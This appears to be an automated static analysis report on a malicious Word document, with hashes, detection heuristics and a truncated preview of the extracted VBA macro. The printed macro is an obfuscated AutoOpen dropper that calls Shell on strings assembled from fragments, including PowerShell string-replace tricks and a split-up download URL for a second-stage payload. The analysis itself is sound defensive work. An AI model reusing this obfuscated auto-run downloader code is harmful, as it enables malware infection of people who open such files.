Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 84586e119ccbdb29…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 177.5 KB
Created: 2017-12-14 22:05:00
Authoring application: Microsoft Office Word
First seen: 2017-12-24
MD5: b3d416303d4b9596404d3ef09fcd536e
SHA-1: da8c91f55c20c49c14bf13755bc7db1c8e418061
SHA-256: 84586e119ccbdb2964a2b52bd047dcbe3fa69700ded0ca5495205e916f9bf3b9
Risk score: 242

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1204.002 Malicious File

The sample is identified as malicious by ClamAV with the signature 'Img.Dropper.PhishingLure-6443153-0'. Static analysis revealed a VBA macro whose AutoOpen routine calls Shell(), which shows the macro is designed to execute an external command, most likely to download and run a second-stage payload, a common technique for malware droppers.

Heuristics (7)

  • ClamAV: Img.Dropper.PhishingLure-6443153-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Img.Dropper.PhishingLure-6443153-0
  • VBA macros detected [medium, 3 related findings] OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA [critical] OLE_VBA_SHELL
  • AutoOpen macro [high] OLE_VBA_AUTOOPEN
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URLs found in document text (OLE body):
    • http://iJnt+JntnJnt+Jj8WPkwj1j
    • http://wwJnt+Jntw.Jnt+JntwDJ7OlSbfC
    • http://schemas.openxmlformats.org/drawingml/2006/main

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 76486 bytes
SHA-256: ea0b2e335d8b222dbfe81141fada5b38a8d00a12ba604b6d975632d1a15c74be

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "qkwkjMMdzb"
Sub AutoOpen()
KCpustH = "FORJCujt" + "BsJIZup" + "WYhGTAEz" + "iqzLlZzXPUozBw" + "kujlZwlIAlV" + "aBlONLFLpu" + "PTMkJZAJVaFWZ" + "SYBzizZPD" + "WiGbnvmlqB" + "SMLbizczv" + "fMzunEOGuT" + "PpOfTZW"
nTfXwALpVAz = "QICqRJjzqYiviS" + "XzwPZGZ" + "AzozucPs" + "vVjGmXNJ" + "WjPokpfzorYkaq" + "BCqdKmXbfYAMi" + "kZjFjkprLPzUwn" + "TWVitFkhkz" + "wIkQjcwC" + "SpitGBJ" + "adqqkELCfipqz" + "zFYlhHufXXtjF"
rbXrwtGGJRO = "YOEuGME" + "qZVVTBwvFS" + "AzhKDKztGmswHW" + "jjadRhifnSG" + "YuzKArV" + "EqDAjISwn" + "cNwqSQUcAOVTus" + "IZzIbrEmIYtcZt" + "PjsppsDh" + "hqYrGslvKDb" + "SpLGXaqRYnui" + "wpbEDEErXblSN"
QnzRWSazqhj = "RNQDtvpzI" + "JrHwXrv" + "ZnKvadbWX" + "RBwtVlnrb" + "ipdNXMdFK" + "ujBcHvHWmm" + "WXYiHEPWVLf" + "cfjKwXNzV" + "zVizVmZi" + "EorLSEfQI" + "joNPTZzXl" + "zZmGKYDA"
VBA.Shell$ jIzzfRN, 0
idwquabk = "RFRHFllXlG" + "ZYPoTQfBk" + "uBiIZkm" + "SosodFftsTAUmm" + "lhKNIWdvZASXEm" + "fBzZTRWkvJIaYL" + "PPHEsaP" + "dbotSoLibH" + "ozVMTiPwPEzwFj" + "lCPztXQiVw" + "YDwjahSfXBt" + "oaddASi"
jJuCISbOVXV = "OoFLzfdSdaMWrA" + "ZPtQMrTuPJu" + "IFEJzjtozUS" + "UoLAJzXKIrC" + "cHIIuuqBFEVMZQ" + "qwMbEwPv" + "fTlRljSQCG" + "rXluFdRYPTwb" + "khMvPwCMMlcbI" + "QWmEKTjVSM" + "WbfrfDjrs" + "DWWBEDUflITw"
BCdPoIJ = "OAdsWWUjh" + "jQrMzPDFPOpjDw" + "WipCosijSp" + "sIhjAzDNjj" + "oCNMjtuZh" + "iTAsfdtDAhZXcX" + "XiOqdqPtJpmpcI" + "osHaNphoUVKJi" + "oRaqRLKjjEFPZr" + "soQvKsj" + "CJFqutUSj" + "uUXMzLwiIJC"
End Sub
Function jIzzfRN()
IJFlHrZio = IsNull("iBmcUNiaKwVJu") + IsNull("vtuhjQnF") + IsNull("PujsEMMqbjP") + IsNull("DwWDIYjzWc") + IsNull("RBDiTGXSAZVX") + IsNull("lViNwItZiprv") + IsNull("ibsDFJmNSq")
vcawMiWR = IsNull("vGjKnouZvwCT") + IsNull("YzHFtMHj") + IsNull("BzMPSnPlcEczLA") + IsNull("sFFYwPzNkuF") + IsNull("paiiTCA") + IsNull("kwXVHJK") + IsNull("wqLMzcNoGj")
qbJiFms = Mid("rn4:publiMTI+M7cWmhHvjP0wzuX7a7bY4ujwuEPm0hGrwN", 4, 11)
cbfkoaRusJ = IsNull("dtjEQPw") + IsNull("aoRnuVBNiHmL") + IsNull("nvcvZwTM") + IsNull("UTicjEYpJPtK") + IsNull("kMnwiDvEFj") + IsNull("pqzHIqScVqT") + IsNull("IRlwptzWSBSLPH")
hbwfJbWhTfw = IsNull("iwckKalsp") + IsNull("VnEtoziVdY") + IsNull("whdhzcRhzG") + IsNull("NrcXitdaicjGh") + IsNull("AqjPUAa") + IsNull("wjQzCMzTKqR") + IsNull("ZMRQSosDpsP")
HVZCsTRzOBs = IsNull("NPQjPnzntHR") + IsNull("SwQoiQNfhwH") + IsNull("KHJMnYm") + IsNull("BPEMEJELJdspY") + IsNull("fZBNnuBc") + IsNull("RIKVHdnAUUZfCs") + IsNull("kVMCVDD")
LBiWCrCZW = Mid("zbW')-creplaCe([cHAr]77+[cHAr]84+[cHAr]73),[cHAr]39 -creplaCe  ([cHAr]57+[cHAr]87+[cHAr]70),[cHAr]36  -rEpLACe  'wpQlmRQ7O83qkw2LlmJBBjuQlmzD83a74d", 4, 113)
SoivBKvw = IsNull("vczlkRfGPiv") + IsNull("GfqQcPStoBinY") + IsNull("zfHXpDUpD") + IsNull("PLisKLPrRY") + IsNull("mwcaaaWm") + IsNull("wKNUUAwssrYRcQ") + IsNull("QjZidmn")
DnjMZt = IsNull("qtirbwPtsWs") + IsNull("BIVPJImQ") + IsNull("SXjjTnjXoT") + IsNull("aiKEZuuduAIv") + IsNull("YzFVdRNYIK") + IsNull("WwLHKiVECG") + IsNull("TwQpOOIVTKcH")
umGjuXz = IsNull("AGKjfwPdzD") + IsNull("bEwNXKMW") + IsNull("ZAsKiaJtAnJHKo") + IsNull("OJTTwdOa") + IsNull("TowSSCXQP") + IsNull("wANAwEmVcKtBR") + IsNull("lzOrtaVKZ")
pEUaXib = Mid("7G9L4nO7vTIndom;HJMTI+MTInt+JntJgJnt+JntbJnt+Jntcd =Jnt+Jnt JntMTI+MTI+Jnt1Jnt+'+'JntCfhttps:Jnt+Jnt//cms.Jnt+JntcpJnt+JntMTI+MTIone-dMTI+MTIev.Jnt+JntcoJnt+Jntm/5KYi6/,Jnt+JnthJnt+JntttJnt+JnMTI+Z9aV2FUMtdAlw3BWaK", 10, 187)
WprKIRWQoN = IsNull("WhKtWGMR") + IsNull("mhbjmTLiEs") + IsNull("miHFoCzQn") + IsNull("NuqDldXchwuUv") + IsNull("iOfbpJoF") + IsNull("qVsaFFTHwihY") + IsNull("lfAqoCWwXSivW")
JQlZSA = IsNull("VHiXnssPrFERX") + IsNull("nnsAvollI") + IsNull("WdPJHzq") + IsNull("GwDaJtSkvTfN") + IsNull("kwwLUhfwlCkwi") + IsNull("KcjIrOR") + IsNull("aKMiwiKs")
FiEFUhWsffL = IsNull("XXbdBIKAit") + IsNull("SXNpwpO") + IsNull("vdzazVmjnTCJi") + IsNull("fwjUAfQckzHm"
... (truncated)